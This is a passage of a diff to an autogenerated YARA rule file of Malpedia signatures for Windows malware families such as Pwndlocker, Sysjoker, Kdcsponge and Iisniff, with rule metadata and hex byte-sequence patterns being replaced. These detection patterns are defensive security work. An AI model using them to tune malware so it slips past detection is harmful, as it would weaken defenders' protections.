+		$sequence_6 = { 488b5928 4885db 750d 488d5930 eb07 488d1d785b0400 33d2 }
+		$sequence_7 = { 664489bd1e010000 ebc2 418bff 488d15009d0100 488bcb e8???????? 4885c0 }
+		$sequence_8 = { e8???????? 90 0f57c0 0f11442458 660f6f0d???????? f30f7f4c2468 c644245800 }
+		$sequence_9 = { 488bcf e8???????? 90 488d4c2450 e8???????? 488bc7 488b4d50 }
 
 	condition:
-		7 of them and filesize < 1392640
+		7 of them and filesize < 727040
 }
-rule MALPEDIA_Win_Unidentified_013_Korean_Malware_Auto : FILE
+rule MALPEDIA_Win_Iisniff_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d60dc930-c78c-5d42-af04-60f16f7605c1"
+		id = "5f9ab050-d8e9-5f55-b8de-0b8b687ab914"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_013_korean_malware"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_013_korean_malware_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.iisniff"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.iisniff_auto.yar#L1-L173"
 		license_url = "N/A"
-		logic_hash = "9a5847dac5275d9c2120b30f47a61dd30ccc7df5d5dee4cad62b8a046a1148d9"
+		logic_hash = "a06a69af46b33b23bbf69f750fc8ce55147252095bace2f8e829199a964e0a2d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -121966,32 +121913,37 @@ rule MALPEDIA_Win_Unidentified_013_Korean_Malware_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6888130000 4f ffd6 e8???????? 85c0 74eb bfb4000000 }
-		$sequence_1 = { eb20 8d4604 c60000 eb18 8bc2 c604083f 897e14 }
-		$sequence_2 = { e8???????? 8d842454030000 50 83ec1c 8bcc 899c2480060000 }
-		$sequence_3 = { 837c242401 0f85be000000 0fb6542e04 3bd1 7412 }
-		$sequence_4 = { e8???????? 83c404 837c243410 7221 8b442420 }
-		$sequence_5 = { 8b4c2410 51 57 50 8944243c ff15???????? 8bf0 }
-		$sequence_6 = { e8???????? 81c41c010000 c3 55 6a00 6a00 }
-		$sequence_7 = { 50 8d842458060000 64a300000000 68???????? 68???????? 68???????? }
-		$sequence_8 = { 8b842420010000 53 56 57 }
-		$sequence_9 = { 395c2440 7304 8d44242c 8a1c38 0fb6cb }
+		$sequence_0 = { 8b8c240c000100 56 8d842414000100 50 51 8d542410 52 }
+		$sequence_1 = { 7413 0fb7542418 8b44241c 50 89570c ff15???????? 8b4f60 }
+		$sequence_2 = { 51 89742478 e8???????? 8b8c2450010000 83c404 5f }
+		$sequence_3 = { e8???????? 8b550c 8b02 89450c 3b35???????? 7442 }
+		$sequence_4 = { 83c710 e8???????? 59 8b4c2414 50 56 6a03 }
+		$sequence_5 = { 8bc7 c20400 55 8bec 56 57 8b7d08 }
+		$sequence_6 = { 6a00 e8???????? c745fcffffffff 8b45dc 8b08 8b5104 8b440228 }
+		$sequence_7 = { 8d8424d0010000 50 89442430 e8???????? }
+		$sequence_8 = { 037dbc 8d5d94 8d75d4 e8???????? 8bf0 e8???????? 8b4dcc }
+		$sequence_9 = { 52 8d842434010000 50 8d4c2420 }
+		$sequence_10 = { 6a03 68000000c0 68???????? ff15???????? 6a02 }
+		$sequence_11 = { 837d1000 57 8bf9 7e5f 53 8b5d08 56 }
+		$sequence_12 = { 6a02 e8???????? 83bc24f000000010 8b8424dc000000 7307 8d8424dc000000 ffb424ec000000 }
+		$sequence_13 = { 59 5e 5b 8b8c243c010000 33cc e8???????? }
+		$sequence_14 = { 8b7d08 33db 68ff0f0000 8d8424cd000000 53 50 889c24d4000000 }
 
 	condition:
-		7 of them and filesize < 204800
+		7 of them and filesize < 1441792
 }
-rule MALPEDIA_Win_Apollo_Shadow_Auto : FILE
+rule MALPEDIA_Win_Pwndlocker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ea905677-b1ee-5a47-bc71-e2c692213f7b"
+		id = "0ef9ef98-b584-5412-b76c-e3c013260c32"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.apollo_shadow"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.apollo_shadow_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pwndlocker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pwndlocker_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "b4c0913bb7700a7eb24e3d781656266dfb7d50769bc9ee1a9816b626000653e9"
+		logic_hash = "5bc1fe4d9dda2a3d7b92f6be48794f673659ba8123fb93f2622432356a3f4a56"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -122005,34 +121957,34 @@ rule MALPEDIA_Win_Apollo_Shadow_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bce e8???????? 4183ceff 488d0590880200 4a8b04f8 42f644e03801 }
-		$sequence_1 = { 48898424e0000000 488bf1 48894c2458 4533f6 4489742430 0f57c0 }
-		$sequence_2 = { 48b8033bae3ba217f877 488945a7 488b75a7 48b8b89c83748f3838d7 488945a7 488b5da7 48b89553bf5390096f5f }
-		$sequence_3 = { 48b8ffffffffffffff7f 483bc8 0f8793000000 4803c9 4881f900100000 7224 488d4127 }
-		$sequence_4 = { 48837d3708 480f43451f 48894d2f 66891c48 eb57 488bd1 }
-		$sequence_5 = { 4053 4883ec20 b908000000 e8???????? 488bd8 4889442430 48c70001000080 }
-		$sequence_6 = { 0f28458f 33ff 4c8d7dc7 48837ddf08 4c0f437dc7 }
-		$sequence_7 = { 448b10 410fb609 83e10f 4a0fbe8431489d0300 428a8c31589d0300 4c2bc8 418b41fc }
-		$sequence_8 = { c744242804000000 488d842480000000 4889442420 41b904000000 4533c0 488b0f ff15???????? }
-		$sequence_9 = { f3410f7f01 f30f7e4108 660f60c0 660f71e008 f3410f7f4110 f30f7e4110 660f60c0 }
+		$sequence_0 = { 668b044e 8b721c 01de 8b0486 }
+		$sequence_1 = { 31ff 31c0 fc ac 84c0 7407 }
+		$sequence_2 = { 49 8d348a 8b36 01de 31ff 31c0 }
+		$sequence_3 = { 75e0 5a 8b7224 01de 31c0 668b044e }
+		$sequence_4 = { 01c7 ebf4 3b7df0 75e0 }
+		$sequence_5 = { 31c0 fc ac 84c0 7407 c1cf0d }
+		$sequence_6 = { 8b7224 01de 31c0 668b044e }
+		$sequence_7 = { 01d8 83c078 8b00 8d3403 8b4e18 8b5620 01da }
+		$sequence_8 = { 83c078 8b00 8d3403 8b4e18 8b5620 01da }
+		$sequence_9 = { ac 84c0 7407 c1cf0d 01c7 ebf4 }
 
 	condition:
-		7 of them and filesize < 710656
+		7 of them and filesize < 65536
 }
-rule MALPEDIA_Win_Virlock_Auto : FILE
+rule MALPEDIA_Win_Minibrowse_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9f47c27a-c9f5-5a88-9d0b-7ae966c8318a"
+		id = "10e3be16-7c28-577f-b9d3-3ef306665a79"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.virlock"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.virlock_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.minibrowse"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.minibrowse_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "57885374cad55b220d8ca1f9432224bf7f5758a9b4619824c3d2cad7d03a8a3d"
+		logic_hash = "832a6f1a1806ae15f070571362445b96d0797510bb64e050cd468771ae5f3839"
 		score = 75
-		quality = 71
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -122044,34 +121996,34 @@ rule MALPEDIA_Win_Virlock_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 81f234ea98fc ba77fa04fa bb5191b6fe e8???????? 81f2fcfd84fd bb9d77e800 81f32dcee8ff }
-		$sequence_1 = { 41 4a 54 52 4a 4b 55 }
-		$sequence_2 = { 68???????? eb0a 68???????? 68???????? e8???????? 83fa00 751b }
-		$sequence_3 = { 49 52 43 52 58 }
-		$sequence_4 = { 3b12 3646 9a19386f50123e 54 0ae7 0220 6f }
-		$sequence_5 = { d0c3 4a 43 d0a90a2bd0f3 }
-		$sequence_6 = { bb666d87fd 83e904 ba0dd2b2fe eb00 83f905 7d74 bb93ec7eff }
-		$sequence_7 = { 6b484768 e4cc 681cafc880 cf 6a78 d6 49 }
-		$sequence_8 = { 70c1 8a6a8f b3f0 46 fd 098f46182e59 53 }
-		$sequence_9 = { 36a25c6a5eac 42 775c 44 e4f2 2b470c d04ba2 }
+		$sequence_0 = { 488b10 488b442440 488b08 49b9fe54fd6de0b04522 4c030d???????? }
+		$sequence_1 = { eb00 488b45b8 8b10 488d4dd8 e8???????? eb00 488b15???????? }
+		$sequence_2 = { 48b82faa1e82712b2956 480305???????? 8b08 48b82faa1e82712b2956 480305???????? 8908 48b82faa1e82712b2956 }
+		$sequence_3 = { ffd0 4889442430 488b542430 488b4c2438 49b8ae95c15973721312 4c0305???????? 48b80ca985ca9581e688 }
+		$sequence_4 = { f7f1 89c1 48b85a5ff63d0a40dfa2 480305???????? 8908 48b85a5ff63d0a40dfa2 480305???????? }
+		$sequence_5 = { b903000000 31d2 f7f1 89c1 48b8d4f3e92d0d1244e8 480305???????? }
+		$sequence_6 = { 48894c2438 488b442438 4889442428 488b4c2440 48ba99b0f0dd579ba6c4 480315???????? 48b86641bd6f7fab0f25 }
+		$sequence_7 = { e9???????? 488b442438 48c7401000000000 488b442438 48c7401807000000 66c744244e0000 488b4c2438 }
+		$sequence_8 = { 01ca 48b9ae6044a06c22125f 48030d???????? 8911 a801 7502 eb36 }
+		$sequence_9 = { 4883ec48 88542447 4c89442438 48894c2430 488b4c2430 48894c2428 48ba856a0e13b3e6f301 }
 
 	condition:
-		7 of them and filesize < 4202496
+		7 of them and filesize < 1779712
 }
-rule MALPEDIA_Win_Rdat_Auto : FILE
+rule MALPEDIA_Win_Chinad_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5a60ab37-0286-51c1-b368-c89969708302"
+		id = "bcb15e04-b813-5c23-a320-19f34e438aaa"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rdat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rdat_auto.yar#L1-L167"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinad"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.chinad_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "a3c5411cc41035f8ac417b9a4fa9bb993690d8d8e560ea34758edef8eeee5bff"
-		score = 60
-		quality = 45
+		logic_hash = "68dce9aa3cd2233ae8311dfd66d73079e3ad26ce882f6e912148b0f3a7f1f190"
+		score = 75
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -122083,38 +122035,32 @@ rule MALPEDIA_Win_Rdat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4c8bc3 4c0f42c7 4d85c0 7504 }
-		$sequence_1 = { 48897020 498bf8 488bda 488bf1 b920000000 }
-		$sequence_2 = { 0f8d9e000000 488b4660 3b5668 7c1d }
-		$sequence_3 = { 0f8d83000000 488b82b0000000 443b82b8000000 7c25 442b82b8000000 48638ab8000000 488b7cc8f8 }
-		$sequence_4 = { 4533c9 488bfa 4c8bc1 85db 7e77 }
-		$sequence_5 = { 4889742410 57 4883ec20 488b02 488bf1 488bfa 488b18 }
-		$sequence_6 = { 0f85a8000000 83791804 0f859e000000 8b4920 }
-		$sequence_7 = { 6690 48ffc3 4038341a 75f7 4883791810 488b7910 7203 }
-		$sequence_8 = { 85c0 740b b9e8030000 ff15???????? }
-		$sequence_9 = { e8???????? 4898 4885c0 751e 483bfb 7313 }
-		$sequence_10 = { 4883ec40 48c740d8feffffff 48895808 48897020 }
-		$sequence_11 = { 0f8d89000000 496398b8000000 498b80b0000000 3bd3 }
-		$sequence_12 = { 488b7910 7203 488b09 483bfb 4c8bc3 4c0f42c7 }
-		$sequence_13 = { 486bd158 490314c0 eb07 488d15f6a30100 f6420820 7417 }
-		$sequence_14 = { 41b803000000 498b17 488d4d90 e8???????? 90 }
-		$sequence_15 = { 90 48c78424b80000000f000000 4c89b424b0000000 c68424a000000000 4983c9ff 4533c0 488d942470030000 }
+		$sequence_0 = { 0facde15 83c007 c1fb15 50 89b574ffffff 899d44ffffff e8???????? }
+		$sequence_1 = { 2385d4feffff 8d93f36f2e68 8985d8feffff 8bc6 2385b8feffff 0985d8feffff 8bc7 }
+		$sequence_2 = { c64418050a 745a 8b048d88ec4300 8a441825 3c0a }
+		$sequence_3 = { 8d8534ffffff 50 e8???????? 8d8534ffffff 50 e8???????? 83c430 }
+		$sequence_4 = { 13bd2cfdffff 81c3281e6323 81d7faffbe90 019d14fdffff 11bd38fdffff }
+		$sequence_5 = { 898508fdffff 8b8514fdffff 33ff 898d2cfdffff 33d2 8b8d38fdffff }
+		$sequence_6 = { 0facca08 8975fc c1e908 8850f8 8bce 8bd3 0facca10 }
+		$sequence_7 = { 50 e8???????? 8b4dec 33c8 8b4514 03c1 894dec }
+		$sequence_8 = { 8b8d9cfeffff 898d9cfeffff 8b9594feffff 899590feffff 8b8598feffff 898594feffff 8b8da4feffff }
+		$sequence_9 = { 8b8520fdffff 0bd1 319508fdffff 33d2 8b8d18fdffff 8bf1 0fa4c119 }
 
 	condition:
-		7 of them and filesize < 1573888
+		7 of them and filesize < 598016
 }
-rule MALPEDIA_Win_Tapaoux_Auto : FILE
+rule MALPEDIA_Win_Remy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "92f6e706-3399-5d0e-9b67-afc2a01b11c8"
+		id = "e336b399-c824-5cff-9d79-2b28637c647b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tapaoux"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tapaoux_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.remy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.remy_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "d4ad8726a2edee7cde7a56aa56890c668a33f52c080a12cbfff5c16b6a3c4a03"
+		logic_hash = "78b349d77eab72ccd2cb565c0bcdfc5bac491569a0a70fac7617d2ce3551a21d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -122128,32 +122074,32 @@ rule MALPEDIA_Win_Tapaoux_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 57 8d442418 68???????? 50 e8???????? 8b07 }
-		$sequence_1 = { 8b4c243e 81e2ffff0000 25ffff0000 52 8b54243e 50 8b442440 }
-		$sequence_2 = { ff15???????? 8a842410050000 83c410 33db }
-		$sequence_3 = { 5b 81c408040000 c3 8b84241c040000 8b4b04 }
-		$sequence_4 = { 83c40c 85c0 56 7d16 }
-		$sequence_5 = { 8d442410 50 e8???????? 8b8c2428010000 83c404 }
-		$sequence_6 = { 8b44241c 8d542410 52 8d8c24d8060000 50 51 57 }
-		$sequence_7 = { 83c410 85c0 7507 b850000000 eb09 50 e8???????? }
-		$sequence_8 = { 8be8 0fbe03 50 e8???????? 83c408 3bc5 }
-		$sequence_9 = { 84c0 74c5 3bf7 7ccf 5f 5e 5d }
+		$sequence_0 = { 668945e1 8845e3 8b4508 885ddc 50 b808000000 8d5ddc }
+		$sequence_1 = { 899c24a0000000 89bc24c0000000 899c24c4000000 899c24c8000000 8b442410 8d542418 52 }
+		$sequence_2 = { 83c404 8db558ffffff e8???????? c645fc01 8b08 8bb564ffffff 8d41f0 }
+		$sequence_3 = { 746e 50 e8???????? 8bf0 eb66 8d4de0 }
+		$sequence_4 = { 8b4d20 b802000000 c745fc00000000 51 6689459c ff15???????? }
+		$sequence_5 = { 8d8d4cffffff 8d9548feffff 898500feffff 898d04feffff 899508feffff 8d853cffffff 8d8d94feffff }
+		$sequence_6 = { c70001000000 8b4620 50 895dac 895da8 ff15???????? 83f8ff }
+		$sequence_7 = { c684243003000002 c7842480010000fe454c35 66c7842484010000fe4c c684248601000000 8d842480010000 800027 40 }
+		$sequence_8 = { 52 6806100000 68ffff0000 56 ff15???????? 6a04 8d45d0 }
+		$sequence_9 = { 8bce e8???????? 837e1410 7202 8b36 8d472c }
 
 	condition:
-		7 of them and filesize < 292864
+		7 of them and filesize < 507904
 }
-rule MALPEDIA_Win_Taintedscribe_Auto : FILE
+rule MALPEDIA_Win_Kdcsponge_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f6a7e40a-4fa2-5a81-9780-0a7ba8af1fba"
+		id = "31a4aae6-c5e0-50ee-8647-19b734337847"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.taintedscribe"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.taintedscribe_auto.yar#L1-L114"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kdcsponge"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kdcsponge_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "410c49d2a558db92d0096ecc5bd9fc38bcaad1e641a570b26cd7d6d98ec29d7e"
+		logic_hash = "797313fd55f6c292fca430846a21ff5b3c78f0f888b26a3429a3aef947194551"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -122167,32 +122113,32 @@ rule MALPEDIA_Win_Taintedscribe_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bcf 0facd110 c1fa10 0fb65330 }
-		$sequence_1 = { 5e 8be5 5d c20800 c7460c00000001 }
-		$sequence_2 = { 8b5358 898d88fbffff 8b4b50 0f94c0 }
-		$sequence_3 = { 8d5594 52 6a04 8d4590 50 56 }
-		$sequence_4 = { 8bd7 8b7b40 0facc218 c1f818 8a4340 }
-		$sequence_5 = { 8b4dcc 894308 8b45d0 50 }
-		$sequence_6 = { 5b 5d c20c00 83f803 7574 }
-		$sequence_7 = { 898da8fbffff 8d45e8 8985b4fcffff 8b433c 8bd0 8d4ddc }
-		$sequence_8 = { 6a00 6a00 ff15???????? 85c0 7516 }
-		$sequence_9 = { bb01000000 d3e3 33c0 85db 7e1e 8d4900 }
+		$sequence_0 = { 80fa01 751c 80bbc204000000 7709 80bbbc0400000f 740a c783a004000002000000 }
+		$sequence_1 = { 41b800100000 488d442440 48894c2448 4889442428 488d0d3bdd0200 4c89742420 ff15???????? }
+		$sequence_2 = { 894364 0fb601 488bcb ff14c2 83bb7804000010 750c d1bb44040000 }
+		$sequence_3 = { 754d 83ba4404000020 7c0f c7826004000004000000 8d4804 eb0f c7826004000002000000 }
+		$sequence_4 = { 4883c8ff 807c030100 488d4001 75f5 448d4801 }
+		$sequence_5 = { 7514 4183b85004000004 750a 4180b8a604000000 740a 488d4201 488b5c2408 }
+		$sequence_6 = { 0fb64101 c1e806 898348040000 83f803 0f84d6000000 488d8b10010000 c7436000001900 }
+		$sequence_7 = { 4053 4883ec20 80b9c304000001 488bd9 0f853d010000 80b9b004000001 0f850a020000 }
+		$sequence_8 = { b800001100 b900001400 0f44c1 894360 7507 c683c504000005 488d8b10010000 }
+		$sequence_9 = { e9???????? 33d2 418bcd 448d4201 e8???????? 488b542440 4c8d1ddb420100 }
 
 	condition:
-		7 of them and filesize < 524288
+		7 of them and filesize < 720896
 }
-rule MALPEDIA_Win_Unidentified_113_Auto : FILE
+rule MALPEDIA_Win_Atharvan_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "026f5486-b8e6-5386-ab78-8b52aa522545"
+		id = "dd431719-94ae-5231-a751-29bdaf0704ba"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_113"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_113_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atharvan"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.atharvan_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "c4dbb7c789bd37f81bad9c32be7e0c5fc26b7a85c7d9e53aaac6f7a0dd9d408f"
+		logic_hash = "19e37c8e9adb39c411ba39c49044a47b42d2c1f02c40c66504cd4acf945815d9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -122206,32 +122152,32 @@ rule MALPEDIA_Win_Unidentified_113_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83c408 be08000000 e9???????? 83f904 0f82a2000000 807c19fe3e }
-		$sequence_1 = { ff742434 ff15???????? ff74243c ff15???????? 57 ff15???????? 8b8c2468030000 }
-		$sequence_2 = { e8???????? 83c40c 8b4c2410 83c502 83d100 894c2410 85c0 }
-		$sequence_3 = { ff74242c 55 57 e8???????? 55 8bf8 e8???????? }
-		$sequence_4 = { ffd6 ff742414 ffd6 8b8c247c040000 5e 33cc e8???????? }
-		$sequence_5 = { ff7630 e8???????? 6a38 6a00 56 e8???????? 8b4710 }
-		$sequence_6 = { ff15???????? 8bd8 899da0feffff 85db 0f84fc030000 0f1f440000 ff15???????? }
-		$sequence_7 = { e8???????? 89442424 83c408 8bc7 837c241c00 0f44d8 53 }
-		$sequence_8 = { c785acf3ffff00000000 0fb608 8bd1 c785b0f3ffff00000000 c785b4f3ffff00000080 83ea01 741d }
-		$sequence_9 = { ff7020 8d44242c 50 8b442434 50 8b4020 ffd0 }
+		$sequence_0 = { f6d1 80c103 8848ff 4883ea01 75eb 448b8504010000 488bd5 }
+		$sequence_1 = { 4885c0 7441 48c7c1ffffffff 0f1f4000 48ffc1 803c0800 }
+		$sequence_2 = { 895128 488d0d9fc10000 488b45d8 488908 488d0d915b0100 488b45d8 }
+		$sequence_3 = { 0fb601 84c0 75f1 488d4c2468 b0c2 }
+		$sequence_4 = { 48c1f806 4c8d0504f50000 83e23f 488d14d2 498b04c0 f644d03801 7424 }
+		$sequence_5 = { ff15???????? 85c0 0f842f010000 b901001000 }
+		$sequence_6 = { 488b08 488d05b8330100 483901 7408 488b09 e8???????? 488b03 }
+		$sequence_7 = { ff15???????? 488bd8 4883f8ff 742b 448d460e 488bc8 }
+		$sequence_8 = { 4533d2 498bd2 4885ff 7e1f 4c8d05179dfeff 4b8b8ce070550200 }
+		$sequence_9 = { 458be0 c7442469cf968ed8 4c8bea c744246d8dc8c4cf }
 
 	condition:
-		7 of them and filesize < 4707328
+		7 of them and filesize < 348160
 }
-rule MALPEDIA_Win_Telepowerbot_Auto : FILE
+rule MALPEDIA_Win_Sysjoker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4bff86f2-d32a-5469-938e-31ce8cf733ec"
+		id = "8b72fee4-7a5b-522c-b325-1510979cb981"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.telepowerbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.telepowerbot_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysjoker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sysjoker_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "80a377e11ec6e9ac3641490e489c4670d07e0d249413d61709ebf14e5db777cd"
+		logic_hash = "a2a2517e767f1ff0b106f5e891c93f19537f3a0c72ffc8109655f6e04ec30bb0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -122245,32 +122191,32 @@ rule MALPEDIA_Win_Telepowerbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a01 68???????? 6a01 50 68???????? ff75f8 ffd6 }
-		$sequence_1 = { 817848d0924100 7409 ff7048 e8???????? 59 }
-		$sequence_2 = { ff348518234100 52 51 e8???????? 83c40c }
-		$sequence_3 = { 43 03c3 03c7 ff348518234100 52 51 e8???????? }
-		$sequence_4 = { eb55 0fb607 0fbe8800914100 41 894dd4 3bca 0f8f9e010000 }
-		$sequence_5 = { f20f59db 660f282d???????? 660f59f5 660f28aaf05e4100 660f54e5 660f58fe 660f58fc }
-		$sequence_6 = { eb07 8b04f5cc4e4100 5f 5e 5b }
-		$sequence_7 = { 8b8d84f8ffff 85c9 0f84b5050000 8b048d5c3d4100 8985a8f8ffff }
-		$sequence_8 = { c1ff06 6bd838 8b04bdf09d4100 f644032801 7444 837c0318ff }
-		$sequence_9 = { 85c9 0f84b5050000 8b048d5c3d4100 8985a8f8ffff 85c0 7562 }
+		$sequence_0 = { 8b4f24 3b4f18 0f83ad060000 8b4714 46 891488 e9???????? }
+		$sequence_1 = { c745d40f000000 c645c000 c78564ffffff90a34400 e8???????? 8d8558ffffff c78554ffffff90a34400 50 }
+		$sequence_2 = { c78500fdffff00000000 33f6 8b3d???????? 89bde0fcffff 0f1f8000000000 }
+		$sequence_3 = { 0f837a100000 8b8fd8000000 85c9 742f 83bfdc00000008 8d87c8000000 }
+		$sequence_4 = { 0f84aafeffff 8b8d6cffffff 2bca 8bc2 83e1fc 81f900100000 }
+		$sequence_5 = { e8???????? 8b45ec 80780d00 74ae 3975dc 0f845e010000 }
+		$sequence_6 = { 8901 51 8bcc c645fc2a 68???????? e8???????? 8d4dc8 }
+		$sequence_7 = { 0f8714010000 52 51 e8???????? 83c408 c645fc01 8b8d48feffff }
+		$sequence_8 = { 52 8b01 ff5004 51 8bf4 89a5f4fcffff }
+		$sequence_9 = { 8906 c645fc12 e8???????? 83c408 e8???????? 8bc8 85c9 }
 
 	condition:
-		7 of them and filesize < 237568
+		7 of them and filesize < 832512
 }
-rule MALPEDIA_Win_Iisniff_Auto : FILE
+rule MALPEDIA_Win_Himan_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5f9ab050-d8e9-5f55-b8de-0b8b687ab914"
+		id = "ed257a76-43f6-55c0-abc7-4725d6aa2228"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.iisniff"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.iisniff_auto.yar#L1-L173"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.himan"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.himan_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "a06a69af46b33b23bbf69f750fc8ce55147252095bace2f8e829199a964e0a2d"
+		logic_hash = "ca6405bd6a0987e5f551c0a2e97e9d04936f65f5adde6e64c734768ea5c267b3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -122284,39 +122230,34 @@ rule MALPEDIA_Win_Iisniff_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b8c240c000100 56 8d842414000100 50 51 8d542410 52 }
-		$sequence_1 = { 7413 0fb7542418 8b44241c 50 89570c ff15???????? 8b4f60 }
-		$sequence_2 = { 51 89742478 e8???????? 8b8c2450010000 83c404 5f }
-		$sequence_3 = { e8???????? 8b550c 8b02 89450c 3b35???????? 7442 }
-		$sequence_4 = { 83c710 e8???????? 59 8b4c2414 50 56 6a03 }
-		$sequence_5 = { 8bc7 c20400 55 8bec 56 57 8b7d08 }
